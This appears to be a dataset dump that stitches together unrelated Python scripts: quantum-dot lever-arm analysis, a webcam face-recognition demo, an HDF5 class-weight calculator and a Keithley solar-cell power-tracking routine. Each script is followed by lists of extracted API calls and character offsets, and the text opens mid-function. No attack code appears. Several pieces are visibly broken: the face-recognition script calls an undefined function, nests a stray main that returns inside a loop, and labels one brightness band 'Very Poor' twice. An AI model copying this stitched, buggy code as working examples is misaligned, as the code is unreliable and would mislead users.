Point 2: further on the addition line for the dot represented on the vertical axis
Point 3: on the triple point at the addition line for the dot represented on the horizontal axis
where both dot levels are aligned''')
elif description == 'lever_arm' and vertical == False:
print('''Please click three points;
Point 1: on the addition line for the dot represented on the horizontal axis
Point 2: further on the addition line for the dot represented on the horizontal axis
Point 3: on the triple point at the addition line for the dot represented on the horizontal axis
where both dot levels are aligned''')
elif description == 'E_charging':
print('''Please click three points;
Point 1: on the (0, 1) - (0,2) addition line
Point 2: further on the (0, 1) - (0,2) addition line
Point 3: on the (0, 0) - (0, 1) addition line ''')
else:
# Do something here such that no three points need to be clicked
print('''Please make sure that the descirption argument of this function
is either 'lever_arm' or 'E_charging' ''')
if points is not None:
clicked_pts = points
else:
clicked_pts=qtt.pgeometry.ginput(3, '.c')
qtt.pgeometry.plotPoints(clicked_pts, ':c')
qtt.pgeometry.plotLabels(clicked_pts)
linePoints1_2 = qtt.pgeometry.fitPlane( clicked_pts[:, 0:2].T )
yy = clicked_pts[:,[2, 2]]; yy[1, -1] += 1
line_vertical = qtt.pgeometry.fitPlane( yy.T )
xx = clicked_pts[:,[2, 2]]; xx[0, -1] += 1
line_horizontal = qtt.pgeometry.fitPlane( xx.T )
if vertical == True:
i = qtt.pgeometry.intersect2lines(linePoints1_2, line_vertical)
intersectPoint = qtt.pgeometry.dehom(i)
line = intersectPoint[:,[0,0]]; line[0,-1]+=1
else:
i = qtt.pgeometry.intersect2lines(linePoints1_2, line_horizontal)
intersectPoint = qtt.pgeometry.dehom(i)
line = intersectPoint[:,[0,0]]; line[1,-1]+=1
linePt3_ints = qtt.pgeometry.fitPlane(line.T)
line_length = np.linalg.norm(intersectPoint - clicked_pts[:,2:3])
# visualize
plotAnalysedLines(clicked_pts, linePoints1_2, line_vertical, line_horizontal, linePt3_ints, intersectPoint)
return {'intersection_point': intersectPoint, 'distance': line_length, 'clicked_points': clicked_pts}
#def intersect2lines(l1, l2):
# """ Caculate intersection between 2 lines """
# r = qtt.pgeometry.null(np.vstack( (l1, l2)) )
# a = qtt.pgeometry.dehom(r[1])
# return a
def lever_arm(bias, results, fig = None):
""" Calculates the lever arm of a dot by using bias triangles in charge sensing. Uses currently active figure.
Args:
bias (float): bias in uV between source and drain while taking the bias triangles
results (dict): dictionary returned from the function perpLineIntersect
containing three points, the intersection point
between a line through 1,2 and the third point and the
length from points 3 to the intersection (horz/vert)
fig (bool): adds lever arm to title of already existing figure with points
Returns:
lev_arm (float): the lever arm of the assigned dot in uV/mV
"""
line_length = results['distance']
#in uV/mV
lev_arm = abs(bias/line_length)
if fig and len(plt.get_fignums()) != 0:
ax = plt.gca()
ax.set_autoscale_on(False)
if np.round(results['clicked_points'][0,2],2) == np.round(results['intersection_point'][0],2):
gate = ax.get_ylabel()[:2]
else:
gate = ax.get_xlabel()[:2]
title = 'Lever arm %s: %.2f $\mu$eV/mV'%(gate, lev_arm)
plt.annotate('Length %s: %.2f mV'%(gate, line_length), xy = (0.05, 0.1), xycoords='axes fraction', color = 'k')
plt.annotate(title, xy = (0.05, 0.05), xycoords='axes fraction', color = 'k')
ax.set_title(title)
return lev_arm
def E_charging(lev_arm, results, fig = None):
"""
Calculates the charging energy of a dot by using charge stability diagrams.
Uses currently active figure.
Args:
lev_arm (float): lever arm for the gate to the dot
results (dict): dictionary returned from the function perpLineIntersect
containing three points, the intersection point
between a line through 1,2 and the third point and the
length from points 3 to the intersection (horz/vert)
fig (bool): adds charging energy to title of already existing figure with points
Returns:
E_charging (float): the charging energy for the dot
"""
line_length = results['distance']
E_c = line_length * lev_arm
if fig and len(plt.get_fignums()) != 0:
ax = plt.gca()
ax.set_autoscale_on(False)
if np.round(results['clicked_points'][0,2],2) == np.round(results['intersection_point'][0],2):
gate = ax.get_ylabel()[:2]
else:
gate = ax.get_xlabel()[:2]
title = 'E_charging %s: %.2f meV'%(gate, E_c/1000)
plt.annotate('Length %s: %.2f mV'%(gate, line_length), xy = (0.05, 0.1), xycoords='axes fraction', color = 'k')
plt.annotate(title, xy = (0.05, 0.05), xycoords='axes fraction', color = 'k')
ax.set_title(title)
return E_c
def test_lever_arm():
lever_arm_fit = {'clicked_points': np.array([[ 24., 38., 40.], [135., 128., 111.]]), 'distance': 15., 'intersection_point': np.array([[ 40.4],[127.]])}
r=lever_arm(-800, lever_arm_fit)
assert(np.abs(r-53.3)<1e-1)
|
[
"numpy.abs",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.figure",
"numpy.linalg.norm",
"matplotlib.pyplot.gca",
"numpy.round",
"qtt.pgeometry.intersect2lines",
"qtt.pgeometry.plot2Dline",
"qtt.pgeometry.dehom",
"qtt.pgeometry.fitPlane",
"qtt.data.diffDataset",
"matplotlib.pyplot.get_fignums",
"qtt.pgeometry.plotLabels",
"qcodes.plots.qcmatplotlib.MatPlot",
"matplotlib.pyplot.annotate",
"qtt.pgeometry.ginput",
"numpy.array",
"numpy.column_stack",
"qtt.pgeometry.plotPoints"
] |
[((918, 974), 'qtt.pgeometry.plot2Dline', 'qtt.pgeometry.plot2Dline', (['linePoints1_2', '""":c"""'], {'alpha': '(0.5)'}), "(linePoints1_2, ':c', alpha=0.5)\n", (942, 974), False, 'import qtt\n'), ((980, 1035), 'qtt.pgeometry.plot2Dline', 'qtt.pgeometry.plot2Dline', (['linePt3_vert', '""":b"""'], {'alpha': '(0.4)'}), "(linePt3_vert, ':b', alpha=0.4)\n", (1004, 1035), False, 'import qtt\n'), ((1039, 1094), 'qtt.pgeometry.plot2Dline', 'qtt.pgeometry.plot2Dline', (['linePt3_horz', '""":b"""'], {'alpha': '(0.4)'}), "(linePt3_horz, ':b', alpha=0.4)\n", (1063, 1094), False, 'import qtt\n'), ((1098, 1153), 'qtt.pgeometry.plot2Dline', 'qtt.pgeometry.plot2Dline', (['linePt3_ints', '""":b"""'], {'alpha': '(0.4)'}), "(linePt3_ints, ':b', alpha=0.4)\n", (1122, 1153), False, 'import qtt\n'), ((1162, 1209), 'qtt.pgeometry.plotPoints', 'qtt.pgeometry.plotPoints', (['intersect_point', '""".b"""'], {}), "(intersect_point, '.b')\n", (1186, 1209), False, 'import qtt\n'), ((1214, 1265), 'qtt.pgeometry.plotPoints', 'qtt.pgeometry.plotPoints', (['clicked_pts[:, 2:3]', '""".b"""'], {}), "(clicked_pts[:, 2:3], '.b')\n", (1238, 1265), False, 'import qtt\n'), ((1295, 1350), 'numpy.column_stack', 'np.column_stack', (['(intersect_point, clicked_pts[:, 2:3])'], {}), '((intersect_point, clicked_pts[:, 2:3]))\n', (1310, 1350), True, 'import numpy as np\n'), ((1354, 1403), 'qtt.pgeometry.plotPoints', 'qtt.pgeometry.plotPoints', (['linePt3_ints_short', '"""b"""'], {}), "(linePt3_ints_short, 'b')\n", (1378, 1403), False, 'import qtt\n'), ((2271, 2301), 'qtt.data.diffDataset', 'diffDataset', (['ds'], {'diff_dir': '"""xy"""'}), "(ds, diff_dir='xy')\n", (2282, 2301), False, 'from qtt.data import diffDataset\n'), ((2306, 2321), 'matplotlib.pyplot.figure', 'plt.figure', (['(588)'], {}), '(588)\n', (2316, 2321), True, 'import matplotlib.pyplot as plt\n'), ((2323, 2332), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (2330, 2332), True, 'import matplotlib.pyplot as plt\n'), ((2337, 2369), 'qcodes.plots.qcmatplotlib.MatPlot', 'MatPlot', (['ds.diff_dir_xy'], {'num': '(588)'}), '(ds.diff_dir_xy, num=588)\n', (2344, 2369), False, 'from qcodes.plots.qcmatplotlib import MatPlot\n'), ((2381, 2390), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (2388, 2390), True, 'import matplotlib.pyplot as plt\n'), ((4064, 4107), 'qtt.pgeometry.plotPoints', 'qtt.pgeometry.plotPoints', (['clicked_pts', '""":c"""'], {}), "(clicked_pts, ':c')\n", (4088, 4107), False, 'import qtt\n'), ((4112, 4149), 'qtt.pgeometry.plotLabels', 'qtt.pgeometry.plotLabels', (['clicked_pts'], {}), '(clicked_pts)\n', (4136, 4149), False, 'import qtt\n'), ((4175, 4220), 'qtt.pgeometry.fitPlane', 'qtt.pgeometry.fitPlane', (['clicked_pts[:, 0:2].T'], {}), '(clicked_pts[:, 0:2].T)\n', (4197, 4220), False, 'import qtt\n'), ((4295, 4323), 'qtt.pgeometry.fitPlane', 'qtt.pgeometry.fitPlane', (['yy.T'], {}), '(yy.T)\n', (4317, 4323), False, 'import qtt\n'), ((4396, 4424), 'qtt.pgeometry.fitPlane', 'qtt.pgeometry.fitPlane', (['xx.T'], {}), '(xx.T)\n', (4418, 4424), False, 'import qtt\n'), ((4845, 4875), 'qtt.pgeometry.fitPlane', 'qtt.pgeometry.fitPlane', (['line.T'], {}), '(line.T)\n', (4867, 4875), False, 'import qtt\n'), ((4894, 4946), 'numpy.linalg.norm', 'np.linalg.norm', (['(intersectPoint - clicked_pts[:, 2:3])'], {}), '(intersectPoint - clicked_pts[:, 2:3])\n', (4908, 4946), True, 'import numpy as np\n'), ((4025, 4054), 'qtt.pgeometry.ginput', 'qtt.pgeometry.ginput', (['(3)', '""".c"""'], {}), "(3, '.c')\n", (4045, 4054), False, 'import qtt\n'), ((4473, 4532), 'qtt.pgeometry.intersect2lines', 'qtt.pgeometry.intersect2lines', (['linePoints1_2', 'line_vertical'], {}), '(linePoints1_2, line_vertical)\n', (4502, 4532), False, 'import qtt\n'), ((4558, 4580), 'qtt.pgeometry.dehom', 'qtt.pgeometry.dehom', (['i'], {}), '(i)\n', (4577, 4580), False, 'import qtt\n'), ((4657, 4718), 'qtt.pgeometry.intersect2lines', 'qtt.pgeometry.intersect2lines', (['linePoints1_2', 'line_horizontal'], {}), '(linePoints1_2, line_horizontal)\n', (4686, 4718), False, 'import qtt\n'), ((4744, 4766), 'qtt.pgeometry.dehom', 'qtt.pgeometry.dehom', (['i'], {}), '(i)\n', (4763, 4766), False, 'import qtt\n'), ((6280, 6289), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6287, 6289), True, 'import matplotlib.pyplot as plt\n'), ((6594, 6707), 'matplotlib.pyplot.annotate', 'plt.annotate', (["('Length %s: %.2f mV' % (gate, line_length))"], {'xy': '(0.05, 0.1)', 'xycoords': '"""axes fraction"""', 'color': '"""k"""'}), "('Length %s: %.2f mV' % (gate, line_length), xy=(0.05, 0.1),\n xycoords='axes fraction', color='k')\n", (6606, 6707), True, 'import matplotlib.pyplot as plt\n'), ((6714, 6787), 'matplotlib.pyplot.annotate', 'plt.annotate', (['title'], {'xy': '(0.05, 0.05)', 'xycoords': '"""axes fraction"""', 'color': '"""k"""'}), "(title, xy=(0.05, 0.05), xycoords='axes fraction', color='k')\n", (6726, 6787), True, 'import matplotlib.pyplot as plt\n'), ((7711, 7720), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (7718, 7720), True, 'import matplotlib.pyplot as plt\n'), ((8018, 8132), 'matplotlib.pyplot.annotate', 'plt.annotate', (["('Length %s: %.2f mV' % (gate, line_length))"], {'xy': '(0.05, 0.1)', 'xycoords': '"""axes fraction"""', 'color': '"""k"""'}), "('Length %s: %.2f mV' % (gate, line_length), xy=(0.05, 0.1),\n xycoords='axes fraction', color='k')\n", (8030, 8132), True, 'import matplotlib.pyplot as plt\n'), ((8139, 8212), 'matplotlib.pyplot.annotate', 'plt.annotate', (['title'], {'xy': '(0.05, 0.05)', 'xycoords': '"""axes fraction"""', 'color': '"""k"""'}), "(title, xy=(0.05, 0.05), xycoords='axes fraction', color='k')\n", (8151, 8212), True, 'import matplotlib.pyplot as plt\n'), ((8331, 8384), 'numpy.array', 'np.array', (['[[24.0, 38.0, 40.0], [135.0, 128.0, 111.0]]'], {}), '([[24.0, 38.0, 40.0], [135.0, 128.0, 111.0]])\n', (8339, 8384), True, 'import numpy as np\n'), ((8422, 8449), 'numpy.array', 'np.array', (['[[40.4], [127.0]]'], {}), '([[40.4], [127.0]])\n', (8430, 8449), True, 'import numpy as np\n'), ((8499, 8515), 'numpy.abs', 'np.abs', (['(r - 53.3)'], {}), '(r - 53.3)\n', (8505, 8515), True, 'import numpy as np\n'), ((6336, 6380), 'numpy.round', 'np.round', (["results['clicked_points'][0, 2]", '(2)'], {}), "(results['clicked_points'][0, 2], 2)\n", (6344, 6380), True, 'import numpy as np\n'), ((6382, 6427), 'numpy.round', 'np.round', (["results['intersection_point'][0]", '(2)'], {}), "(results['intersection_point'][0], 2)\n", (6390, 6427), True, 'import numpy as np\n'), ((7767, 7811), 'numpy.round', 'np.round', (["results['clicked_points'][0, 2]", '(2)'], {}), "(results['clicked_points'][0, 2], 2)\n", (7775, 7811), True, 'import numpy as np\n'), ((7813, 7858), 'numpy.round', 'np.round', (["results['intersection_point'][0]", '(2)'], {}), "(results['intersection_point'][0], 2)\n", (7821, 7858), True, 'import numpy as np\n'), ((6242, 6259), 'matplotlib.pyplot.get_fignums', 'plt.get_fignums', ([], {}), '()\n', (6257, 6259), True, 'import matplotlib.pyplot as plt\n'), ((7673, 7690), 'matplotlib.pyplot.get_fignums', 'plt.get_fignums', ([], {}), '()\n', (7688, 7690), True, 'import matplotlib.pyplot as plt\n')]
|
import face_recognition
import cv2
import numpy as np
import os
import re
from itertools import chain
known_people_folder='./database'
def scan_known_people(known_people_folder):
known_names = []
known_face_encodings = []
for file in image_files_in_folder(known_people_folder):
basename = os.path.splitext(os.path.basename(file))[0]
img = face_recognition.load_image_file(file)
encodings = face_recognition.face_encodings(img)
print('in face finding function')
if len(encodings) > 1:
click.echo("WARNING: More than one face found in {}. Only considering the first face.".format(file))
if len(encodings) == 0:
click.echo("WARNING: No faces found in {}. Ignoring file.".format(file))
else:
known_names.append(basename)
known_face_encodings.append(encodings[0])
def main(known_people_folder, image_to_check, cpus, tolerance, show_distance):
print('in second main')
known_face_encodings.append(encodings[0])
return known_names, known_face_encodings
def image_files_in_folder(folder):
print('in image files in folder fucntion')
return [os.path.join(folder, f) for f in os.listdir(folder) if re.match(r'.*\.(jpg|jpeg|png)', f, flags=re.I)]
#improved:-
# 1. Process each video frame at 1/4 resolution (though still display it at full resolution)
# 2. Only detect faces in every other frame of video.
#There you go, i pulled a little sneaky on you.
known_people_folder='./database'
# Get a reference to webcam #0 (the default one)
video_capture = cv2.VideoCapture(0)
# Create arrays of known face encodings and their names
known_face_names,known_face_encodings = scan_known_people(known_people_folder)
# Initialize some variables
face_locations = []
face_encodings = []
face_names = []
process_this_frame = True
while True:
# Grab a single frame of video
ret, frame = video_capture.read()
#Converting the imgage to HLS for brightness(Light intersity) Detection
imgHLS = cv2.cvtColor(frame, cv2.COLOR_BGR2HLS)
Lchannel = imgHLS[:,:,1]
a=list(chain.from_iterable(Lchannel))
brightness=sum(a)/len(a)
if(brightness<=75):
condition="Very Poor"
if(brightness<=85 and brightness >75):
condition=" Poor"
if(brightness<=95 and brightness >85):
condition="Good"
if(brightness <=105 and brightness >95):
condition="Very Poor"
if(brightness >105):
condition="Excellent"
print(condition)
#print(brightness)
#np.array(Lchannel).tolist()
#print(type(Lchannel))
# Resize frame of video to 1/4 size for faster face recognition processing
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
# Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)
rgb_small_frame = small_frame[:, :, ::-1]
# Only process every other frame of video to save time
if process_this_frame:
# Find all the faces and face encodings in the current frame of video
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
face_names = []
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
matches = face_recognition.compare_faces(known_face_encodings, face_encoding)
name = "Unknown"
# # If a match was found in known_face_encodings, just use the first one.
# if True in matches:
# first_match_index = matches.index(True)
# name = known_face_names[first_match_index]
# Or instead, use the known face with the smallest distance to the new face
face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)
best_match_index = np.argmin(face_distances)
if matches[best_match_index]:
name = known_face_names[best_match_index]
face_names.append(name)
process_this_frame = not process_this_frame
# Display the results
for (top, right, bottom, left), name in zip(face_locations, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 4
right *= 4
bottom *= 4
left *= 4
# Draw a box around the face
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# Draw a label with a name below the face
cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
cv2.putText(frame,'Brightness/Visiblity: '+condition,(80,30), font,1,(255,255,255),1,cv2.LINE_AA)
cv2.putText(frame,'Press Q to Quit',(5,470), font,0.5,(255,255,255),1,cv2.LINE_AA)
# Display the resulting image
cv2.imshow('Video', frame)
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# Release handle to the webcam
video_capture.release()
cv2.destroyAllWindows()
|
[
"face_recognition.compare_faces",
"numpy.argmin",
"cv2.rectangle",
"cv2.imshow",
"os.path.join",
"cv2.cvtColor",
"face_recognition.face_encodings",
"cv2.destroyAllWindows",
"cv2.resize",
"face_recognition.face_distance",
"os.path.basename",
"cv2.waitKey",
"re.match",
"os.listdir",
"cv2.putText",
"cv2.VideoCapture",
"face_recognition.face_locations",
"face_recognition.load_image_file",
"itertools.chain.from_iterable"
] |
[((1610, 1629), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (1626, 1629), False, 'import cv2\n'), ((5245, 5268), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (5266, 5268), False, 'import cv2\n'), ((2053, 2091), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2HLS'], {}), '(frame, cv2.COLOR_BGR2HLS)\n', (2065, 2091), False, 'import cv2\n'), ((2732, 2775), 'cv2.resize', 'cv2.resize', (['frame', '(0, 0)'], {'fx': '(0.25)', 'fy': '(0.25)'}), '(frame, (0, 0), fx=0.25, fy=0.25)\n', (2742, 2775), False, 'import cv2\n'), ((5066, 5092), 'cv2.imshow', 'cv2.imshow', (['"""Video"""', 'frame'], {}), "('Video', frame)\n", (5076, 5092), False, 'import cv2\n'), ((370, 408), 'face_recognition.load_image_file', 'face_recognition.load_image_file', (['file'], {}), '(file)\n', (402, 408), False, 'import face_recognition\n'), ((429, 465), 'face_recognition.face_encodings', 'face_recognition.face_encodings', (['img'], {}), '(img)\n', (460, 465), False, 'import face_recognition\n'), ((1193, 1216), 'os.path.join', 'os.path.join', (['folder', 'f'], {}), '(folder, f)\n', (1205, 1216), False, 'import os\n'), ((2137, 2166), 'itertools.chain.from_iterable', 'chain.from_iterable', (['Lchannel'], {}), '(Lchannel)\n', (2156, 2166), False, 'from itertools import chain\n'), ((3115, 3163), 'face_recognition.face_locations', 'face_recognition.face_locations', (['rgb_small_frame'], {}), '(rgb_small_frame)\n', (3146, 3163), False, 'import face_recognition\n'), ((3189, 3253), 'face_recognition.face_encodings', 'face_recognition.face_encodings', (['rgb_small_frame', 'face_locations'], {}), '(rgb_small_frame, face_locations)\n', (3220, 3253), False, 'import face_recognition\n'), ((4493, 4559), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(left, top)', '(right, bottom)', '(0, 0, 255)', '(2)'], {}), '(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n', (4506, 4559), False, 'import cv2\n'), ((4619, 4707), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(left, bottom - 35)', '(right, bottom)', '(0, 0, 255)', 'cv2.FILLED'], {}), '(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2\n .FILLED)\n', (4632, 4707), False, 'import cv2\n'), ((4750, 4829), 'cv2.putText', 'cv2.putText', (['frame', 'name', '(left + 6, bottom - 6)', 'font', '(1.0)', '(255, 255, 255)', '(1)'], {}), '(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n', (4761, 4829), False, 'import cv2\n'), ((4838, 4950), 'cv2.putText', 'cv2.putText', (['frame', "('Brightness/Visiblity: ' + condition)", '(80, 30)', 'font', '(1)', '(255, 255, 255)', '(1)', 'cv2.LINE_AA'], {}), "(frame, 'Brightness/Visiblity: ' + condition, (80, 30), font, 1,\n (255, 255, 255), 1, cv2.LINE_AA)\n", (4849, 4950), False, 'import cv2\n'), ((4944, 5039), 'cv2.putText', 'cv2.putText', (['frame', '"""Press Q to Quit"""', '(5, 470)', 'font', '(0.5)', '(255, 255, 255)', '(1)', 'cv2.LINE_AA'], {}), "(frame, 'Press Q to Quit', (5, 470), font, 0.5, (255, 255, 255),\n 1, cv2.LINE_AA)\n", (4955, 5039), False, 'import cv2\n'), ((1226, 1244), 'os.listdir', 'os.listdir', (['folder'], {}), '(folder)\n', (1236, 1244), False, 'import os\n'), ((1248, 1294), 're.match', 're.match', (['""".*\\\\.(jpg|jpeg|png)"""', 'f'], {'flags': 're.I'}), "('.*\\\\.(jpg|jpeg|png)', f, flags=re.I)\n", (1256, 1294), False, 'import re\n'), ((3409, 3476), 'face_recognition.compare_faces', 'face_recognition.compare_faces', (['known_face_encodings', 'face_encoding'], {}), '(known_face_encodings, face_encoding)\n', (3439, 3476), False, 'import face_recognition\n'), ((3864, 3931), 'face_recognition.face_distance', 'face_recognition.face_distance', (['known_face_encodings', 'face_encoding'], {}), '(known_face_encodings, face_encoding)\n', (3894, 3931), False, 'import face_recognition\n'), ((3963, 3988), 'numpy.argmin', 'np.argmin', (['face_distances'], {}), '(face_distances)\n', (3972, 3988), True, 'import numpy as np\n'), ((5140, 5154), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (5151, 5154), False, 'import cv2\n'), ((329, 351), 'os.path.basename', 'os.path.basename', (['file'], {}), '(file)\n', (345, 351), False, 'import os\n')]
|
import os
import sys
import h5py
import argparse
import numpy as np
parser = argparse.ArgumentParser()
parser.add_argument('--root', help='path to root directory')
args = parser.parse_args()
root = args.root
fname = os.path.join(root, 'metadata/train.txt')
flist = [os.path.join(root, 'h5', line.strip())
for line in open(fname, 'r')]
fname = os.path.join(root, 'metadata', 'classes.txt')
classes = [line.strip() for line in open(fname, 'r')]
num_classes = len(classes)
sizes = np.zeros(num_classes)
total = np.zeros(num_classes)
for fname in flist:
print('> Processing {}...'.format(fname))
fin = h5py.File(fname)
coords = fin['coords'][:]
points = fin['points'][:]
labels = fin['labels'][:]
labels = labels.reshape(-1, 2)
num_points = labels.shape[0]
for i in range(num_classes):
indices = (labels[:, 0] == i)
size = np.sum(indices)
sizes[i] += size
if size == 0: continue
total[i] += num_points
freq = sizes / total
weight = np.median(freq) / freq
fname = os.path.join(root, 'metadata', 'weight.txt')
print('> Saving statistics to {}...'.format(fname))
np.savetxt(fname, weight, fmt='%f')
|
[
"h5py.File",
"numpy.sum",
"argparse.ArgumentParser",
"numpy.median",
"numpy.savetxt",
"numpy.zeros",
"os.path.join"
] |
[((79, 104), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (102, 104), False, 'import argparse\n'), ((220, 260), 'os.path.join', 'os.path.join', (['root', '"""metadata/train.txt"""'], {}), "(root, 'metadata/train.txt')\n", (232, 260), False, 'import os\n'), ((357, 402), 'os.path.join', 'os.path.join', (['root', '"""metadata"""', '"""classes.txt"""'], {}), "(root, 'metadata', 'classes.txt')\n", (369, 402), False, 'import os\n'), ((492, 513), 'numpy.zeros', 'np.zeros', (['num_classes'], {}), '(num_classes)\n', (500, 513), True, 'import numpy as np\n'), ((522, 543), 'numpy.zeros', 'np.zeros', (['num_classes'], {}), '(num_classes)\n', (530, 543), True, 'import numpy as np\n'), ((1049, 1093), 'os.path.join', 'os.path.join', (['root', '"""metadata"""', '"""weight.txt"""'], {}), "(root, 'metadata', 'weight.txt')\n", (1061, 1093), False, 'import os\n'), ((1146, 1181), 'numpy.savetxt', 'np.savetxt', (['fname', 'weight'], {'fmt': '"""%f"""'}), "(fname, weight, fmt='%f')\n", (1156, 1181), True, 'import numpy as np\n'), ((621, 637), 'h5py.File', 'h5py.File', (['fname'], {}), '(fname)\n', (630, 637), False, 'import h5py\n'), ((1017, 1032), 'numpy.median', 'np.median', (['freq'], {}), '(freq)\n', (1026, 1032), True, 'import numpy as np\n'), ((883, 898), 'numpy.sum', 'np.sum', (['indices'], {}), '(indices)\n', (889, 898), True, 'import numpy as np\n')]
|
import argparse
import time
import numpy as np
import pyvisa
# Parse folder path, file name, and measurement parameters from command line
# arguments. Remember to include the "python" keyword before the call to the
# python file from the command line, e.g. python example.py "arg1" "arg2".
# Folder paths must use forward slashes to separate subfolders.
parser = argparse.ArgumentParser(
description='Measure and save max power point tracking data')
parser.add_argument(
'folder_path',
metavar='folder_path',
type=str,
help='Absolute path to the folder containing max P stabilisation data')
parser.add_argument(
'file_name',
metavar='file_name',
type=str,
help='Name of the file to save the data to')
parser.add_argument(
'V_start',
metavar='V_start',
type=float,
help='Seed voltage for maximum power point tracker (V)')
parser.add_argument(
'nplc',
metavar='nplc',
type=float,
help='Integration filter in number of power line cycles (NPLC)')
parser.add_argument(
't_settling', metavar='t_settling', type=float, help='Settling delay (ms)')
parser.add_argument(
't_track',
metavar='t_track',
type=float,
help='Time to track maximum power point for (s)')
parser.add_argument('A', metavar='A', type=float, help='Device area (cm^2)')
parser.add_argument(
'num_of_suns',
metavar='num_of_suns',
type=float,
help='Number of suns equivalent illumination intensity')
args = parser.parse_args()
# Assign argparse arguments to variables
folderpath = args.folder_path
filename = args.file_name
V_start = args.V_start
A = args.A
nplc = args.nplc
t_settling = args.t_settling
t_track = args.t_track
suns = args.num_of_suns
V_range = np.absolute(V_start)
# Set current measurement range to 10 times SQ limit for 0.5 eV
# bandgap for the given area
I_range = 10 * 0.065 * A
# Assign the VISA resource to a variable
rm = pyvisa.ResourceManager()
keithley2400 = rm.open_resource('GPIfdf8:f53e:61e4::18::INSTR')
keithley2400.query('*IDN?')
keithley2400.write('*RST')
keithley2400.encoding = 'latin-1'
# Disable the output
keithley2400.write('OUTP OFF')
# Enable 4-wire sense
keithley2400.write(':SYST:RSEN 1')
# Don't auto-off source after measurement
keithley2400.write(':SOUR:CLE:AUTO OFF')
# Set source mode to voltage
keithley2400.write(':SOUR:FUNC VOLT')
# Set output-off mode to high impedance
keithley2400.write(':OUTP:SMOD HIMP')
# Set the voltage range
keithley2400.write(':SOUR:VOLT:RANG {}'.format(V_range))
# Set the current range
keithley2400.write(':SOUR:CURR:RANG {}'.format(I_range))
# Set the delay
keithley2400.write(':SOUR:DEL {}'.format(t_settling))
# Set the integration filter
keithley2400.write(':SENS:CURR:NPLC {}'.format(nplc))
# Disable autozero
keithley2400.write(':SYST:AZER OFF')
def track_max_power(V, t_track):
"""Maximum power point stabilizer.
Holding at a fixed voltage (V), measure the power output for a fixed
amount of time (t_track), taking as many measurements as possible.
Parameters
----------
V : float
Seed voltage for the maximum power point tracker (V)
t_track : float
Time to track the maximum power point for (s)
Returns
-------
ts : list of float
Timestamps for every measurement (UTC)
Vs : list of float
Vs (V)
Is : list of float
Is (A)
Ps : list of float
Ps (W)
Js : list of float
Current densities (mA / cm^2)
PCEs : list of float
Power conversion PCEs (%)
"""
# Initialise empty lists for storing data
ts = []
Vs = []
Is = []
Js = []
Ps = []
PCEs = []
# Turn on the Keithley output at zero volts and measure for 4s in the dark
keithley2400.write(':SOUR:VOLT {}'.format(V))
keithley2400.write('OUTP ON')
# Start timing
t_start = time.time()
t = time.time()
# Measure Jsc in the dark for 3s
while t - t_start < 3:
ts.append(t - t_start)
data = keithley2400.query(':MEAS:CURR?') # Measure the current
data = data.split(',')
data = [float(item) for item in data]
Vs.append(data[0])
Is.append(data[1])
Js.append(data[1] * 1000 / A)
Ps.append(data[0] * data[1])
PCEs.append(np.absolute(data[0] * data[1] * 1000 / (suns * A)))
t = time.time()
# Open the shutter of the solar simulator
keithley2400.write(':SOUR2:TTL 0')
# Measure at V in the light for t_track
i = len(Vs) - 1
while t - t_start < t_track + 3:
ts.append(t - t_start)
data = keithley2400.query(':MEAS:CURR?') # Measure the current
data = data.split(',')
data = [float(item) for item in data]
Vs.append(data[0])
Is.append(data[1])
Js.append(data[1] * 1000 / A)
Ps.append(data[0] * data[1])
PCEs.append(np.absolute(data[0] * data[1] * 1000 / (suns * A)))
t = time.time()
i += 1
return ts, Vs, Is, Js, Ps, PCEs
# Turn off display
keithley2400.write(':DISP:ENAB 0')
# Manually reset zero reference values
keithley2400.write(':SYST:AZER ONCE')
# Track max power
mppt_results = track_max_power(V_start, t_track)
# Disable output
keithley2400.write('OUTP OFF')
# Close shutter
keithley2400.write(':SOUR2:TTL 1')
# Turn off display
keithley2400.write(':DISP:ENAB 1')
# Format and save the results
np.savetxt(
folderpath + filename,
np.transpose(np.array(mppt_results)),
fmt='%.9f',
delimiter='\t',
newline='\r\n',
header='Time (s)\tV\tI (A)\tJ (mA/cm^2)\tP (W)\tPCE (%)',
comments='')
# Close the visa resource manager
keithley2400.close()
|
[
"numpy.absolute",
"pyvisa.ResourceManager",
"argparse.ArgumentParser",
"time.time",
"numpy.array"
] |
